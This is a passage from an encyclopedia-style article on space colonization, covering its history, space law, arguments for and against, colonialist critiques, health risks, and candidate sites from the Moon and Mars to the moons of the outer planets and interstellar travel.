space in outer space. A group of equatorial countries, all of which were countries that were once colonies of colonial empires, but without spaceflight capabilities, signed in 1976 the Bogota Declaration. These countries declared that geostationary orbit is a limited natural resource and belongs to the equatorial countries directly below, seeing it not as part of outer space, humanity's common. Through this, the declaration challenged the dominance of geostationary orbit by spacefaring countries through identifying their dominance as imperialistic. Furthermore this dominance in space has foreshadowed threats to the Outer Space Treaty guaranteed accessibility to space, as in the case of space debris which is ever increasing because of a lack of access regulation. In 1977, the first sustained space habitat, the Salyut 6 station, was put into Earth's orbit. Eventually the first space stations were succeeded by the ISS, today's largest human outpost in space and closest to a space settlement. Built and operated under a multilateral regime, it has become a blueprint for future stations, such as around and possibly on the Moon. An international regime for lunar activity was demanded by the international Moon Treaty, but is currently developed multilaterally as with the Artemis Accords. The only habitation on a different celestial body so far have been the temporary habitats of the crewed lunar landers. Similar to the Artemis program, China is leading an effort to develop a lunar base called the International Lunar Research Station beginning in the 2030s. Conceptual In the first half of the 17th century John Wilkins suggested in A Discourse Concerning a New Planet that future adventurers like Francis Drake and Christopher Columbus might reach the Moon and allow people to live there. The first known work on space colonization was the 1869 novella The Brick Moon by Edward Everett Hale, about an inhabited artificial satellite. In 1897, Kurd Lasswitz also wrote about space colonies. The Russian rocket science pioneer Konstantin Tsiolkovsky foresaw elements of the space community in his book Beyond Planet Earth written about 1900. Tsiolkovsky imagined his space travelers building greenhouses and raising crops in space. Tsiolkovsky believed that going into space would help perfect human beings, leading to immortality and peace. One of the first to speak about space colonization was Cecil Rhodes who in 1902 spoke about "these stars that you see overhead at night, these vast worlds which we can never reach", adding "I would annex the planets if I could; I often think of that. It makes me sad to see them so clear and yet so far". In the 1920s John Desmond Bernal, Hermann Oberth, Guido von Pirquet and Herman Noordung further developed the idea. Wernher von Braun contributed his ideas in a 1952 Colliers magazine article. In the 1950s and 1960s, Dandridge M. Cole published his ideas. Another seminal book on the subject was the book The High Frontier: Human Colonies in Space by Gerard K. O'Neill in 1977 which was followed the same year by Colonies in Space by T. A. Heppenheimer. Marianne J. Dyson wrote Home on the Moon; Living on a Space Frontier in 2003; Peter Eckart wrote Lunar Base Handbook in 2006 and then Harrison Schmitt's Return to the Moon written in 2007. Law, governance, and sovereignty Space activity is legally based on the Outer Space Treaty, the main international treaty. But space law has become a larger legal field, which includes other international agreements such as the significantly less ratified Moon Treaty and diverse national laws. The Outer Space Treaty established the basic ramifications for space activity in article one: "The exploration and use of outer space, including the Moon and other celestial bodies, shall be carried out for the benefit and in the interests of all countries, irrespective of their degree of economic or scientific development, and shall be the province of all mankind." And continued in article two by stating: "Outer space, including the Moon and other celestial bodies, is not subject to national appropriation by claim of sovereignty, by means of use or occupation, or by any other means." The development of international space law has revolved much around outer space being defined as common heritage of mankind. The Magna Carta of Space presented by William A. Hyman in 1966 framed outer space explicitly not as terra nullius but as res communis, which subsequently influenced the work of the United Nations Committee on the Peaceful Uses of Outer Space. Reasons Survival of human civilization A primary argument calling for space colonization is the long-term survival of human civilization and terrestrial life. By developing alternative locations off Earth, the planet's species, including humans, could live on in the event of natural or human-made disasters on Earth. On two occasions, theoretical physicist and cosmologist Stephen Hawking argued for space colonization as a means of saving humanity. In 2001, Hawking predicted that the human race would become extinct within the next thousand years unless colonies could be established in space. In 2010, he stated that humanity faces two options: either we colonize space within the next two hundred years, or we will face the long-term prospect of extinction. In 2005, then NASA Administrator Michael Griffin identified space colonization as the ultimate goal of current spaceflight programs, saying: Louis J. Halle Jr., formerly of the United States Department of State, wrote in Foreign Affairs (Summer 1980) that the colonization of space will protect humanity in the event of global nuclear warfare. The physicist Paul Davies also supports the view that if a planetary catastrophe threatens the survival of the human species on Earth, a self-sufficient colony could "reverse-colonize" Earth and restore human civilization. The author and journalist William E. Burrows and the biochemist Robert Shapiro proposed a private project, the Alliance to Rescue Civilization, with the goal of establishing an off-Earth "backup" of human civilization. Based on his Copernican principle, J. Richard Gott has estimated that the human race could survive for another 7.8 million years, but it is not likely to ever colonize other planets. However, he expressed a hope to be proven wrong, because "colonizing other worlds is our best chance to hedge our bets and improve the survival prospects of our species". In a theoretical study from 2019, a group of researchers have pondered the long-term trajectory of human civilization. It is argued that due to Earth's finitude as well as the limited duration of the Solar System, mankind's survival into the far future will very likely require extensive space colonization. This 'astronomical trajectory' of mankind, as it is termed, could come about in four steps: First step, space colonies could be established at various habitable locations — be it in outer space or on celestial bodies away from Earth – and allowed to remain temporarily dependent on support from Earth. In the second step, these colonies could gradually become self-sufficient, enabling them to survive if or when the mother civilization on Earth fails or dies. Third step, the colonies could develop and expand their habitation by themselves on their space stations or celestial bodies, for example via terraforming. In the fourth step, the colonies could self-replicate and establish new colonies further into space, a process that could then repeat itself and continue at an exponential rate throughout the cosmos. However, this astronomical trajectory may not be a lasting one, as it will most likely be interrupted and eventually decline due to resource depletion or straining competition between various human factions, bringing about some 'star wars' scenario. Vast resources in space Resources in space, both in materials and energy, are enormous. The Solar System has enough material and energy to support anywhere from several thousand to over a billion times that of the current Earth-based human population, mostly from the Sun itself. Asteroid mining will likely be a key player in space colonization. Water and materials to make structures and shielding can be easily found in asteroids. Instead of resupplying on Earth, mining and fuel stations need to be established on asteroids to facilitate better space travel. Optical mining is the term NASA uses to describe extracting materials from asteroids. NASA believes by using propellant derived from asteroids for exploration to the moon, Mars, and beyond will save $100 billion. If funding and technology come sooner than estimated, asteroid mining might be possible within a decade. Although some items of the infrastructure requirements above can already be easily produced on Earth and would therefore not be very valuable as trade items (oxygen, water, base metal ores, silicates, etc.), other high-value items are more abundant, more easily produced, of higher quality, or can only be produced in space. These could provide (over the long-term) a high return on the initial investment in space infrastructure. Some of these high-value trade goods include precious metals, gemstones, power, solar cells, ball bearings, semi-conductors, and pharmaceuticals. The mining and extraction of metals from a small asteroid the size of 3554 Amun or (6178) 1986 DA, both small near-Earth asteroids, may yield 30 times as much metal as humans have mined throughout history. A metal asteroid this size would be worth approximately US$20 trillion at 2001 market prices The main impediments to commercial exploitation of these resources are the very high cost of initial investment, the very long period required for the expected return on those investments (The Eros Project plans a 50-year development), and the fact that the venture has never been carried out before—the high-risk nature of the investment. Expansion with fewer negative consequences Expansion of humans and technological progress has usually resulted in some form of environmental devastation, and destruction of ecosystems and their accompanying wildlife. In the past, expansion has often come at the expense of displacing many indigenous peoples, the resulting treatment of these peoples ranging anywhere from encroachment to genocide. Because space has no known life, this need not be a consequence, as some space settlement advocates have pointed out. However, on some bodies of the Solar System, there is the potential for extant native lifeforms and so the negative consequences of space colonization cannot be dismissed. Counterarguments state that changing only the location but not the logic of exploitation will not create a more sustainable future. Alleviating overpopulation and resource demand An argument for space colonization is to mitigate proposed impacts of overpopulation of Earth, such as resource depletion. If the resources of space were opened to use and viable life-supporting habitats were built, Earth would no longer define the limitations of growth. Although many of Earth's resources are non-renewable, off-planet colonies could satisfy the majority of the planet's resource requirements. With the availability of extraterrestrial resources, demand on terrestrial ones would decline. Proponents of this idea include Stephen Hawking and Gerard K. O'Neill. Others including cosmologist Carl Sagan and science fiction writers Arthur C. Clarke, and Isaac Asimov, have argued that shipping any excess population into space is not a viable solution to human overpopulation. According to Clarke, "the population battle must be fought or won here on Earth". The problem for these authors is not the lack of resources in space (as shown in books such as Mining the Sky), but the physical impracticality of shipping vast numbers of people into space to "solve" overpopulation on Earth. Other arguments Advocates for space colonization cite a presumed innate human drive to explore and discover, and call it a quality at the core of progress and thriving civilizations. Nick Bostrom has argued that from a utilitarian perspective, space colonization should be a chief goal as it would enable a very large population to live for a very long time (possibly billions of years), which would produce an enormous amount of utility (or happiness). He claims that it is more important to reduce existential risks to increase the probability of eventual colonization than to accelerate technological development so that space colonization could happen sooner. In his paper, he assumes that the created lives will have positive ethical value despite the problem of suffering. In a 2001 interview with Freeman Dyson, J. Richard Gott and Sid Goldstein, they were asked for reasons why some humans should live in space. Their answers were: Spread life and beauty throughout the universe Ensure the survival of our species Make money through new forms of space commercialization such as solar-power satellites, asteroid mining, and space manufacturing Save the environment of Earth by moving people and industry into space Biotic ethics is a branch of ethics that values life itself. For biotic ethics, and their extension to space as panbiotic ethics, it is a human purpose to secure and propagate life and to use space to maximize life. Difficulties There would be many problems in colonizing the outer Solar System. These include: Distance from Earth – The outer planets are much farther from Earth than the inner planets, and would therefore be harder and more time-consuming to reach. In addition, return voyages may well be prohibitive considering the time and distance. Extreme cold – temperatures are near absolute zero in many parts of the outer Solar System. Power – Solar power is many times less concentrated in the outer Solar System than in the inner Solar System. It is unclear as to whether it would be usable there, using some form of concentration mirrors, or whether nuclear power would be necessary. There have also been proposals to use the gravitational potential energy of planets or dwarf planets with moons. Effects of low gravity on the human body – All moons of the gas giants and all outer dwarf planets have a very low gravity, the highest being Io's gravity (0.183 g) which is less than 1/5 of the Earth's gravity. Since the Apollo program all crewed spaceflight has been constrained to Low Earth orbit and there has been no opportunity to test the effects of such low gravitational accelerations on the human body. It is speculated (but not confirmed) that the low gravity environments might have very similar effects to long-term exposure in weightlessness. Such effects can be avoided by rotating spacecraft creating artificial gravity. Dust – breathing risks associated with fine dust from rocky surface objects, for similar reasons as harmful effects of lunar dust. Criticisms Space colonization has been seen as a relief to the problem of human overpopulation as early as 1758, and listed as one of Stephen Hawking's reasons for pursuing space exploration. Critics note, however, that a slowdown in population growth rates since the 1980s has alleviated the risk of overpopulation. Critics also argue that the costs of commercial activity in space are too high to be profitable against Earth-based industries, and hence that it is unlikely to see significant exploitation of space resources in the foreseeable future. Other objections include concerns that the forthcoming colonization and commodification of the cosmos is likely to enhance the interests of the already powerful, including major economic and military institutions e.g. the large financial institutions, the major aerospace companies and the military–industrial complex, to lead to new wars, and to exacerbate pre-existing exploitation of workers and resources, economic inequality, poverty, social division and marginalization, environmental degradation, and other detrimental processes or institutions. Additional concerns include creating a culture in which humans are no longer seen as human, but rather as material assets. The issues of human dignity, morality, philosophy, culture, bioethics, and the threat of megalomaniac leaders in these new "societies" would all have to be addressed in order for space colonization to meet the psychological and social needs of people living in isolated colonies. As an alternative or addendum for the future of the human race, many science fiction writers have focused on the realm of the 'inner-space', that is the computer-aided exploration of the human mind and human consciousness—possibly en route developmentally to a Matrioshka Brain. Robotic spacecraft are proposed as an alternative to gain many of the same scientific advantages without the limited mission duration and high cost of life support and return transportation involved in human missions. A corollary to the Fermi paradox—"nobody else is doing it"—is the argument that, because no evidence of alien colonization technology exists, it is statistically unlikely to even be possible to use that same level of technology ourselves. Colonialism Space colonization has been discussed as postcolonial continuation of imperialism and colonialism, calling for decolonization instead of colonization. Critics argue that the present politico-legal regimes and their philosophic grounding, advantage imperialist development of space, that key decisionmakers in space colonization are often wealthy elites affiliated with private corporations, and that space colonization would primarily appeal to their peers rather than ordinary citizens. Furthermore, it is argued that there is a need for inclusive and democratic participation and implementation of any space exploration, infrastructure or habitation. According to space law expert Michael Dodge, existing space law, such as the Outer Space Treaty, guarantees access to space, but does not enforce social inclusiveness or regulate non-state actors. Particularly the narrative of the "New Frontier" has been criticized as unreflected continuation of settler colonialism and manifest destiny, continuing the narrative of exploration as fundamental to the assumed human nature. Joon Yun considers space colonization as a solution to human survival and global problems like pollution to be imperialist; others have identified space as a new sacrifice zone of colonialism. Furthermore the understanding of space as empty and separate is considered a continuation of terra nullius. Natalie B. Trevino argues that not colonialism but coloniality will be carried into space if not reflected on. More specifically the advocacy for territorial colonization of Mars has been called surfacism, in contrast to habitation in the atmospheric space of Venus, a concept similar to Thomas Golds surface chauvinism. More generally space infrastructure such as the Mauna Kea Observatories have also been criticized and protested against as being colonialist. Guiana Space Centre has also been the site of anti-colonial protests, connecting colonization as an issue on Earth and in space. In regard to the scenario of extraterrestrial first contact, it has been argued that the employment of colonial language would endanger such first impressions and encounters. Furthermore spaceflight as a whole and space law more particularly has been criticized as a postcolonial project by being built on a colonial legacy and by not facilitating the sharing of access to space and its benefits, too often allowing spaceflight to be used to sustain colonialism and imperialism, most of all on Earth instead. Planetary protection Agencies conducting interplanetary missions are guided by COSPAR's planetary protection policies, to have at most 300,000 spores on the exterior of the craft—and more thoroughly sterilized if they contact "special regions" containing water, or it could contaminate life-detection experiments or the planet itself. It is impossible to sterilize human missions to this level, as humans are host to typically a hundred trillion microorganisms of thousands of species of the human microbiome, and these cannot be removed while preserving the life of the human. Containment seems the only option, but it is a major challenge in the event of a hard landing (i.e. crash). There have been several planetary workshops on this issue, but with no final guidelines yet for a way forward. Human explorers could also inadvertently contaminate Earth if they return to the planet while carrying extraterrestrial microorganisms. Physical and mental health risks to colonists The health of the humans who may participate in a colonization venture would be subject to increased physical, mental and emotional risks. NASA learned that – without gravity – bones lose minerals, causing osteoporosis. Bone density may decrease by 1% per month, which may lead to a greater risk of osteoporosis-related fractures later in life. Fluid shifts towards to the head may cause vision problems. NASA found that isolation in closed environments aboard the International Space Station led to depression, sleep disorders, and diminished personal interactions, likely due to confined spaces and the monotony and boredom of long space flight. Circadian rhythm may also be susceptible to the effects of space life due to the effects on sleep of disrupted timing of sunset and sunrise. This can lead to exhaustion, as well as other sleep problems such as insomnia, which can reduce their productivity and lead to mental health disorders. High-energy radiation is a health risk that colonists would face, as radiation in deep space is deadlier than what astronauts face now in low Earth orbit. Metal shielding on space vehicles protects against only 25–30% of space radiation, possibly leaving colonists exposed to the other 70% of radiation and its short and long-term health complications. Risk of astronomical suffering Space colonization, while often seen as a bold step for humanity, is likely to result in catastrophic outcomes. The potential for creating vast suffering, including extreme forms, may outweight perceived benefits. Scholars like Phil Torres and Daniel Deudney argue that expansion into space could escalate perpetual conflict, insecurity, and even increase risks of human extinction. This aligns with the notion that space expansion amplifies both suffering in non-extinction scenarios and risks tied to advanced AI systems. Furthermore, the "astronomical atrocity problem" raises ethical concerns about whether positive outcomes can ever justify immense suffering. According to some authors, strategic approaches are crucial—if inevitable, space colonization should prioritize compassionate agents to mitigate risks of dystopian outcomes. Locations Space colonization has been envisioned at many different locations inside and outside the Solar System, but most commonly at Mars and the Moon. Altogether it has been argued that space colonization extends from Earth, building on colonization of Earth, extending colonialism into space from colonial land on Earth and using it for spaceflight, as with Guiana Space Centre, and by building facilities for space colonization, as with Starbase. Extending as a system it often incorporates different locations from Earth, the orbital space around it and the Moon to almost any location beyond the Moon. Near-Earth space Earth orbit Geostationary orbit was an early issue of discussion about space colonization, with equatorial countries argueing for special rights to the orbit (see Bogota Declaration). Space debris, particularly in low Earth orbit, has been characterized as a product of colonization by occupying space and hindering access to space through excessive pollution with debris, with drastic increases in the course of military activity and without a lack of management. Most of the delta-v budget, and thus propellant, of a launch is used bringing a spacecraft to low Earth orbit. This is the main reason why Jerry Pournelle said "If you can get your ship into orbit, you're halfway to anywhere". Therefore the main advantages to constructing a space settlement in Earth orbit are accessibility to the Earth and already-existing economic motives such as space hotels and space manufacturing. However, a big disadvantage is that orbit does not host any materials that is available for exploitation. Space colonization altogether might eventually demand lifting vast amounts of payload into orbit, making thousands of daily launches potentially unsustainable. Various theoretical concepts, such as orbital rings and skyhooks, have been proposed to reduce the cost of accessing space. Moon The Moon is discussed as a target for colonization, due to its proximity to Earth and lower escape velocity. The Moon is reachable from Earth in three days, has a near-instant communication to Earth, with minable minerals, no atmosphere, and low gravity, making it extremely easy to ship materials and products to orbit. Abundant ice is trapped in permanently shadowed craters near the poles, which could provide support for the water needs of a lunar colony, though indications that mercury is also similarly trapped there may pose health concerns. Native precious metals, such as gold, silver, and probably platinum, are also concentrated at the lunar poles by electrostatic dust transport. There are only a few materials on the Moon which have been identified to make economic sense to ship directly back to the Earth, which are helium-3 (for fusion power) and rare-earth minerals (for electronics). Instead, it makes more sense for these materials to be used in-space or being turned into valuable products for export. However, the Moon's lack of atmosphere provides no protection from space radiation or meteoroids, so lunar lava tubes have been proposed sites to gain protection. The Moon's low surface gravity is also a concern, as it is unknown whether 1/6g is enough to maintain human health for long periods. Since the Moon has extreme temperature swings and toxic lunar regolith, it is argued by some that the Moon will not become a place of habitation, but instead attract polluting extraction and manufacturing industries. Furthermore it has been argued that moving these industries to the Moon could help protect the Earth's environment and allow poorer countries to be released from the shackles of neocolonialism by wealther countries. In the space colonization framework, the Moon will be transformed into an industrial hub of the Solar System. Interest in establishing a moonbase has increased in the 21st century as an intermediate to Mars colonization. The European Space Agency (ESA) head Jan Woerner at the International Astronautical Congress in Bremen, Germany, in October, 2018 proposed cooperation among countries and companies on lunar capabilities, a concept referred to as Moon Village. In a December 2017 directive, the first Trump administration steered NASA to include a lunar mission on the pathway to other beyond Earth orbit (BEO) destinations. In 2023, the U.S. Defense Department started a study of the necessary infrastructure and capabilities required to develop a moon-based economy over the following ten years. As of 2024 on the one side China, together with other countries, has declared the intend to establish its International Lunar Research Station, and on the other side the United States which is proceeding with partner countries with its Artemis program including Moonbases at the poles near permanently shadowed craters in the 2030s. The Chinese Lunar Exploration Program has been identified as to bolster China's political influence and enhance its bid for superpower status, and the United States seeking to maintain its position as the leading space power. Lagrange points Another near-Earth possibility are the stable Earth–Moon Lagrange points and , at which point a space colony can float indefinitely. The L5 Society was founded to promote settlement by building space stations at these points. Gerard K. O'Neill suggested in 1974 that the L5 point, in particular, could fit several thousand floating colonies, and would allow easy travel to and from the colonies due to the shallow effective potential at this point. Mars The hypothetical colonization of Mars has received interest from public space agencies and private corporations and has received extensive treatment in science fiction writing, film, and art. While there have been many plans for a human Mars mission, including affordable ones such as Mars Direct, none has been realized as of 2024. Both the United States and China has plans to send humans to Mars sometime in the 2040s, but these plans are not backed with hardware and funding. However, SpaceX is currently developing Starship, a super-heavy-lift reusable launch vehicle, with a vision of sending humans to Mars. As of November 2024, the company plans to send five uncrewed Starships to Mars in either 2026 or 2028–2029 launch windows and SpaceX's CEO Elon Musk has repeatingly stated to back the Mars efforts financially and politically. Mars is more suitable for habitation than the Moon, with a stronger gravity, rich amount of materials needed for life, day/night cycle nearly identical to Earth, and a thin atmosphere to protect from micrometeroids. The main disadvantage of Mars compared to the Moon is the six-to-nine-month transit time and the lengthy launch window, which occurs approximately every two years. Without in situ resource utlization, Mars colonization would be nearly impossible as it would require bringing thousands of tons of payload to sustain a handful of astronauts. If Martian materials can be used to make propellant (such as methane with the Sabatier process) and supplies (such as oxygen for crews), the amount of supplies needed to bring to Mars can be greatly reduced. Even then, Mars colonies will not be economically viable in the near term, thus reasons for colonizing Mars will be mostly ideological and prestige-based, such as a desire for freedom. Other inner Solar System bodies Mercury Mercury is rich of metals and volatiles, as well as solar energy. However, Mercury is the most energy-consuming body on the Solar System to land for spacecraft launching from Earth, and astronauts there must contend with the extreme temperature differential and radiation. Once thought to be a volatile-depleted body like the Moon, Mercury is now known to be volatile-rich, surprisingly richer in volatiles than any other terrestrial body in the inner Solar System. The planet also receives six and a half times the solar flux as the Earth/Moon system, making solar energy an effective energy source; it could be harnessed through orbital solar arrays and beamed to the surface or exported to other planets. Geologist Stephen Gillett suggested in 1996, that this could make Mercury an ideal place to build and launch solar sail spacecraft, which could launch as folded "chunks" by a mass driver from Mercury's surface. Once in space, the solar sails would deploy. Solar energy for the mass driver should be easy to produce, and solar sails near Mercury would have 6.5 times the thrust they do near Earth. This could make Mercury an ideal place to acquire materials useful in building hardware to send to (and terraform) Venus. Vast solar collectors could also be built on or near Mercury to produce power for large-scale engineering activities such as laser-pushed light sails to nearby star systems. As Mercury has essentially no axial tilt, crater floors near its poles lie in eternal darkness, never seeing the Sun. They function as cold traps, trapping volatiles for geological periods. It is estimated that the poles of Mercury contain 1014–1015 kg of water, likely covered by about 5.65×109 m3 of hydrocarbons. This would make agriculture possible. It has been suggested that plant varieties could be developed to take advantage of the high light intensity and the long day of Mercury. The poles do not experience the significant day-night variations the rest of Mercury do, making them the best place on the planet to begin a colony. Another option is to live underground, where day-night variations would be damped enough that temperatures would stay roughly constant. There are indications that Mercury contains lava tubes, like the Moon and Mars, which would be suitable for this purpose. Underground temperatures in a ring around Mercury's poles can reach room temperature on Earth, 22±1 °C; and this is achieved at depths starting from about 0.7 m. This presence of volatiles and abundance of energy has led Alexander Bolonkin and James Shifflett to consider Mercury preferable to Mars for colonization. Yet a third option could be to continually move to stay on the night side, as Mercury's 176-day-long day-night cycle means that the terminator travels very slowly. Because Mercury is very dense, its surface gravity is 0.38g like Mars, even though it is a smaller planet. This would be easier to adjust to than lunar gravity (0.16g), but presents advantages regarding lower escape velocity from Mercury than from Earth. Mercury's proximity gives it advantages over the asteroids and outer planets, and its low synodic period means that launch windows from Earth to Mercury are more frequent than those from Earth to Venus or Mars. On the downside, a Mercury colony would require significant shielding from radiation and solar flares, and since Mercury is airless, decompression and temperature extremes would be constant risks. Venus Though the surface of Venus is extremely hostile, habitats high above the atmosphere of Venus are fairly habitable, with a temperature of around 50 °C and a pressure similar to the Earth's sea level. However, beside tourism opportunities, the economic benefit of a Venusian colonies is minimal. Asteroid belt Asteroids can provide enough material in the form of water, air, fuel, metal, soil, and nutrients to support ten to a hundred trillion humans in space. Many asteroids contain minerals that are inheriently valuable, such as rare earths and precious metals. However, low gravity, distance from Earth and disperse nature of their orbits make it difficult to settle on small asteroids. Giant planets There have also been proposals to place robotic aerostats in the upper atmospheres of the Solar System's giant planets for exploration and possibly mining of helium-3, which could have a very high value per unit mass as a thermonuclear fuel. Robert Zubrin identified Saturn, Uranus and Neptune as "the Persian Gulf of the Solar System", as the largest sources of deuterium and helium-3 to drive a fusion economy, with Saturn the most important and most valuable of the three, because of its relative proximity, low radiation, and large system of moons. On the other hand, planetary scientist John Lewis in his 1997 book Mining the Sky, insists that Uranus is the likeliest place to mine helium-3 because of its significantly shallower gravity well, which makes it easier for a laden tanker spacecraft to thrust itself away. Furthermore, Uranus is an ice giant, which would likely make it easier to separate the helium from the atmosphere. Because Uranus has the lowest escape velocity of the four giant planets, it has been proposed as a mining site for helium-3. If human supervision of the robotic activity proved necessary, one of Uranus's natural satellites might serve as a base. It is hypothesized that one of Neptune's satellites could be used for colonization. Triton's surface shows signs of extensive geological activity that implies a subsurface ocean, perhaps composed of ammonia/water. If technology advanced to the point that tapping such geothermal energy was possible, it could make colonizing a cryogenic world like Triton feasible, supplemented by nuclear fusion power. Moons of outer planets Human missions to the outer planets would need to arrive quickly due to the effects of space radiation and microgravity along the journey. In 2012, Thomas B. Kerwick wrote that the distance to the outer planets made their human exploration impractical for now, noting that travel times for round trips to Mars were estimated at two years, and that the closest approach of Jupiter to Earth is over ten times farther than the closest approach of Mars to Earth. However, he noted that this could change with "significant advancement on spacecraft design". Nuclear-thermal or nuclear-electric engines have been suggested as a way to make the journey to Jupiter in a reasonable amount of time. Another possibility would be plasma magnet sails, a technology already suggested for rapidly sending a probe to Jupiter. The cold would also be a factor, necessitating a robust source of heat energy for spacesuits and bases. Most of the larger moons of the outer planets contain water ice, liquid water, and organic compounds that might be useful for sustaining human life. Robert Zubrin has suggested Saturn, Uranus, and Neptune as advantageous locations for colonization because their atmospheres are good sources of fusion fuels, such as deuterium and helium-3. Zubrin suggested that Saturn would be the most important and valuable as it is the closest and has an extensive satellite system. Jupiter's high gravity makes it difficult to extract gases from its atmosphere, and its strong radiation belt makes developing its system difficult. On the other hand, fusion power has yet to be achieved, and fusion power from helium-3 is more difficult to achieve than conventional deuterium–tritium fusion. Jeffrey Van Cleve, Carl Grillmair, and Mark Hanna instead focus on Uranus, because the delta-v required to get helium-3 from the atmosphere into orbit is half that needed for Jupiter, and because Uranus' atmosphere is five times richer in helium than Saturn's. Jupiter's Galilean moons (Io, Europa, Ganymede, and Callisto) and Saturn's Titan are the only moons that have gravities comparable to Earth's Moon. The Moon has a 0.17g gravity; Io, 0.18g; Europa, 0.13g; Ganymede, 0.15g; Callisto, 0.13g; and Titan, 0.14g. Neptune's Triton has about half the Moon's gravity (0.08g); other round moons provide even less (starting from Uranus' Titania and Oberon at about 0.04g). Jovian moons The Jovian system in general has particular disadvantages for colonization, including a deep gravity well. The magnetosphere of Jupiter bombards the moons of Jupiter with intense ionizing radiation delivering about 36 Sv per day to unshielded colonists on Io and about 5.40 Sv per day on Europa. Exposure to about 0.75 Sv over a few days is enough to cause radiation poisoning, and about 5 Sv over a few days is fatal. Jupiter itself, like the other gas giants, has further disadvantages. There is no accessible surface on which to land, and the light hydrogen atmosphere would not provide good buoyancy for some kind of aerial habitat as has been proposed for Venus. Radiation levels on Io and Europa are extreme, enough to kill unshielded humans within an Earth day. Therefore, only Callisto and perhaps Ganymede could reasonably support a human colony. Callisto orbits outside Jupiter's radiation belt. Ganymede's low latitudes are partially shielded by the moon's magnetic field, though not enough to completely remove the need for radiation shielding. Both of them have available water, silicate rock, and metals that could be mined and used for construction. Although Io's volcanism and tidal heating constitute valuable resources, exploiting them is probably impractical. Europa is rich in water (its subsurface ocean is expected to contain over twice as much water as all Earth's oceans together) and likely oxygen, but metals and minerals would have to be imported. If alien microbial life exists on Europa, human immune systems may not protect against it. Sufficient radiation shielding might, however, make Europa an interesting location for a research base. The private Artemis Project drafted a plan in 1997 to colonize Europa, involving surface igloos as bases to drill down into the ice and explore the ocean underneath, and suggesting that humans could live in "air pockets" in the ice layer. Ganymede and Callisto are also expected to have internal oceans. It might be possible to build a surface base that would produce fuel for further exploration of the Solar System. In 2003, NASA performed a study called HOPE (Revolutionary Concepts for Human Outer Planet Exploration) regarding the future exploration of the Solar System. The target chosen was Callisto due to its distance from Jupiter, and thus the planet's harmful radiation. It could be possible to build a surface base that would produce fuel for further exploration of the Solar System. HOPE estimated a round trip time for a crewed mission of about 2–5 years, assuming significant progress in propulsion technologies. Io is not ideal for colonization, due to its hostile environment. The moon is under influence of high tidal forces, causing high volcanic activity. Jupiter's strong radiation belt overshadows Io, delivering 36 Sv a day to the moon. The moon is also extremely dry. Io is the least ideal place for the colonization of the four Galilean moons. Despite this, its volcanoes could be energy resources for the other moons, which are better suited to colonization. Ganymede is the largest moon in the Solar System. Ganymede is the only moon with a magnetosphere, albeit overshadowed by Jupiter's magnetic field. Because of this magnetic field, Ganymede is one of only two Jovian moons where surface settlements would be feasible because it receives about 0.08 Sv of radiation per day. Ganymede could be terraformed. The Keck Observatory announced in 2006 that the binary Jupiter trojan 617 Patroclus, and possibly many other Jupiter trojans, are likely composed of water ice, with a layer of dust. This suggests that mining water and other volatiles in this region and transporting them elsewhere in the Solar System, perhaps via the proposed Interplanetary Transport Network, may be feasible in the not-so-distant future. This could make colonization of the Moon, Mercury and main-belt asteroids more practical. Saturn Saturn's radiation belt is much weaker than Jupiter's, so radiation is less of an issue here. Dione, Rhea, Titan, and Iapetus all orbit outside the radiation belt, and Titan's thick atmosphere would adequately shield against cosmic radiation. Saturn has seven moons large enough to be round: in order of increasing distance from Saturn, they are Mimas, Enceladus, Tethys, Dione, Rhea, Titan, and Iapetus. Enceladus The small moon Enceladus is also of interest, having a subsurface ocean that is separated from the surface by only tens of meters of ice at the south pole, compared to kilometers of ice separating the ocean from the surface on Europa. Volatile and organic compounds are present there, and the moon's high density for an ice world (1.6 g/cm3) indicates that its core is rich in silicates. On 9 March 2006, NASA's Cassini space probe found possible evidence of liquid water on Enceladus. According to that article, "pockets of liquid water may be no more than tens of meters below the surface." These findings were confirmed in 2014 by NASA. This means liquid water could be collected much more easily and safely on Enceladus than, for instance, on Europa (see above). Discovery of water, especially liquid water, generally makes a celestial body a much more likely candidate for colonization. An alternative model of Enceladus's activity is the decomposition of methane/water clathrates – a process requiring lower temperatures than liquid water eruptions. The higher density of Enceladus indicates a larger than Saturnian average silicate core that could provide materials for base operations. Titan Trans-Neptunian region Beyond the Solar System Beyond the Solar System colonization targets might be identified in the surrounding stars. The main difficulty is the vast distances to other stars. To reach such targets travel times of millennia would be necessary, with current technology. At average speeds of even 0.1% of the speed of light (c) interstellar expansion across the entire Milky Way galaxy would take up to one-half of the Sun's galactic orbital period of ~240,000,000 years, which is comparable to the timescale of other galactic processes. Due to fundamental energy and reaction mass consideration such speeds would be with current technology limited to small spaceships. If humanity would gain access to a large amount of energy, on the order of the mass-energy of entire planets, it may become possible to construct spaceships with Alcubierre drives. The following are plausible approaches with current technology: A generation ship which would travel much slower than light, with consequent interstellar trip times of many decades or centuries. The crew would go through generations before the journey was complete, so none of the initial crew would be expected to survive to arrive at the destination, assuming current human lifespans. A sleeper ship, where most or all of the crew spend the journey in some form of hibernation or suspended animation, allowing some or all to reach the destination. An embryo-carrying interstellar starship (EIS), much smaller than a generation ship or sleeper ship, transporting human embryos or DNA in a frozen or dormant state to the destination. (Obvious biological and psychological problems in birthing, raising, and educating such voyagers, neglected here, may not be fundamental.) A nuclear fusion or fission powered ship (e.g. ion drive) of some kind, achieving velocities of up to perhaps 10% c  permitting one-way trips to nearby stars with durations comparable to a human lifetime. A Project Orion-ship, a nuclear-powered concept proposed by Freeman Dyson which would use nuclear explosions to propel a starship. A special case of the preceding nuclear rocket concepts, with similar potential velocity capability, but possibly easier technology. Laser propulsion concepts, using some form of beaming of power from the Solar System might allow a light-sail or other ship to reach high speeds, comparable to those theoretically attainable by the fusion-powered electric rocket, above. These methods would need some means, such as supplementary nuclear propulsion, to stop at the destination, but a hybrid (light-sail for acceleration, fusion-electric for deceleration) system might be possible. Uploaded human minds or artificial intelligence may be transmitted via radio or laser at light speed to interstellar destinations where self-replicating spacecraft have traveled subluminally and set up infrastructure and possibly also brought some minds. Extraterrestrial intelligence might be another viable destination. Intergalactic travel The distances between galaxies are on the order of a million times farther than those between the stars, and thus intergalactic colonization would involve voyages of millions of years via special self-sustaining methods. Implementation Building colonies in space would require access to water, food, space, people, construction materials, energy, transportation, communications, life support, simulated gravity, radiation protection, migration, governance and capital investment. It is likely the colonies would be located near the necessary physical resources. The practice of space architecture seeks to transform spaceflight from a heroic test of human endurance to a normality within the bounds of comfortable experience. As is true of other frontier-opening endeavors, the capital investment necessary for space colonization would probably come from governments, an argument made by John Hickman and Neil deGrasse Tyson. Migration Human spaceflight has enabled only temporarily 